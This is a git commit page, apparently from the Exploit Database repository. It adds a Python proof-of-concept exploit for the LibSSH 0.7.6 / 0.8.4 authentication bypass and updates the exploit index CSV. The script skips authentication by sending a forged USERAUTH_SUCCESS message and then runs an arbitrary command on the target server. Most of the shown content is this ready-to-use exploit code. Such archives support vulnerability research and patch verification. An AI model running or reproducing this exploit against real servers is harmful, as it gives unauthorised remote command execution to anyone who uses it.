DB: 2019-02-04
4 changes to exploits/shellcodes Tiki Wiki 15.1 - File Upload (Metasploit) LibSSH 0.7.6 / 0.8.4 - Unauthorized Access Tiki Wiki 15.1 - File Upload (Metasploit)
This commit is contained in:
Offensive Security
parent
6050f45223
commit
40a94aad26
3 changed files with 53 additions and 1 deletions
51
exploits/linux/remote/46307.py
Executable file
51
exploits/linux/remote/46307.py
Executable file
|
|
@ -0,0 +1,51 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
import sys
|
||||||
|
import paramiko
|
||||||
|
import socket
|
||||||
|
import logging
|
||||||
|
|
||||||
|
# pip3 install paramiko==2.0.8
|
||||||
|
|
||||||
|
#logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
|
||||||
|
logging.basicConfig(stream=sys.stdout)
|
||||||
|
bufsize = 2048
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def execute(hostname, port, command):
|
||||||
|
sock = socket.socket()
|
||||||
|
try:
|
||||||
|
sock.connect((hostname, int(port)))
|
||||||
|
|
||||||
|
message = paramiko.message.Message()
|
||||||
|
transport = paramiko.transport.Transport(sock)
|
||||||
|
transport.start_client()
|
||||||
|
|
||||||
|
message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
|
||||||
|
transport._send_message(message)
|
||||||
|
|
||||||
|
client = transport.open_session(timeout=10)
|
||||||
|
client.exec_command(command)
|
||||||
|
|
||||||
|
# stdin = client.makefile("wb", bufsize)
|
||||||
|
stdout = client.makefile("rb", bufsize)
|
||||||
|
stderr = client.makefile_stderr("rb", bufsize)
|
||||||
|
|
||||||
|
output = stdout.read()
|
||||||
|
error = stderr.read()
|
||||||
|
|
||||||
|
stdout.close()
|
||||||
|
stderr.close()
|
||||||
|
|
||||||
|
return (output+error).decode()
|
||||||
|
except paramiko.SSHException as e:
|
||||||
|
logging.exception(e)
|
||||||
|
logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
|
||||||
|
except socket.error:
|
||||||
|
logging.debug("Unable to connect.")
|
||||||
|
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
|
||||||
|
|
@ -11784,7 +11784,6 @@ id,file,description,date,author,type,platform,port
|
||||||
12815,exploits/windows/remote/12815.txt,"GoAheaad WebServer - Source Code Disclosure",2010-05-30,Sil3nt_Dre4m,remote,windows,
|
12815,exploits/windows/remote/12815.txt,"GoAheaad WebServer - Source Code Disclosure",2010-05-30,Sil3nt_Dre4m,remote,windows,
|
||||||
12834,exploits/windows/remote/12834.py,"XFTP 3.0 Build 0239 - 'Filename' Remote Buffer Overflow",2010-06-01,sinn3r,remote,windows,
|
12834,exploits/windows/remote/12834.py,"XFTP 3.0 Build 0239 - 'Filename' Remote Buffer Overflow",2010-06-01,sinn3r,remote,windows,
|
||||||
12865,exploits/hardware/remote/12865.txt,"Motorola Surfboard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",remote,hardware,
|
12865,exploits/hardware/remote/12865.txt,"Motorola Surfboard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",remote,hardware,
|
||||||
40091,exploits/php/remote/40091.rb,"Tiki Wiki 15.1 - File Upload (Metasploit)",2016-07-11,"Mehmet Ince",remote,php,80
|
|
||||||
13588,exploits/multiple/remote/13588.pl,"2^6 TCP Control Bit - Fuzzer (No ECN or CWR)",2010-01-11,ShadowHatesYou,remote,multiple,
|
13588,exploits/multiple/remote/13588.pl,"2^6 TCP Control Bit - Fuzzer (No ECN or CWR)",2010-01-11,ShadowHatesYou,remote,multiple,
|
||||||
13735,exploits/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Remote Buffer Overflow",2010-06-05,d1dn0t,remote,osx,8080
|
13735,exploits/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Remote Buffer Overflow",2010-06-05,d1dn0t,remote,osx,8080
|
||||||
13787,exploits/multiple/remote/13787.txt,"Adobe Flash / Reader - Live Malware",2010-06-09,anonymous,remote,multiple,
|
13787,exploits/multiple/remote/13787.txt,"Adobe Flash / Reader - Live Malware",2010-06-09,anonymous,remote,multiple,
|
||||||
|
|
@ -17149,6 +17148,7 @@ id,file,description,date,author,type,platform,port
|
||||||
46220,exploits/windows/remote/46220.txt,"Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution",2019-01-22,"Eduardo Braun Prado",remote,windows,
|
46220,exploits/windows/remote/46220.txt,"Microsoft Windows VCF or Contact' File - URL Manipulation-Spoof Arbitrary Code Execution",2019-01-22,"Eduardo Braun Prado",remote,windows,
|
||||||
46242,exploits/linux/remote/46242.txt,"Ghostscript 9.26 - Pseudo-Operator Remote Code Execution",2019-01-24,"Google Security Research",remote,linux,
|
46242,exploits/linux/remote/46242.txt,"Ghostscript 9.26 - Pseudo-Operator Remote Code Execution",2019-01-24,"Google Security Research",remote,linux,
|
||||||
46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,
|
46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,
|
||||||
|
46307,exploits/linux/remote/46307.py,"LibSSH 0.7.6 / 0.8.4 - Unauthorized Access",2018-10-20,jas502n,remote,linux,
|
||||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||||
|
|
@ -24678,6 +24678,7 @@ id,file,description,date,author,type,platform,port
|
||||||
12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php,
|
12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php,
|
||||||
12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php,
|
12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php,
|
||||||
12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php,
|
12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php,
|
||||||
|
40091,exploits/php/webapps/40091.rb,"Tiki Wiki 15.1 - File Upload (Metasploit)",2016-07-11,"Mehmet Ince",webapps,php,80
|
||||||
30170,exploits/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",webapps,php,
|
30170,exploits/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",webapps,php,
|
||||||
18593,exploits/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,webapps,php,
|
18593,exploits/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,webapps,php,
|
||||||
18594,exploits/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,webapps,php,
|
18594,exploits/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,webapps,php,
|
||||||
|
|
|
||||||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue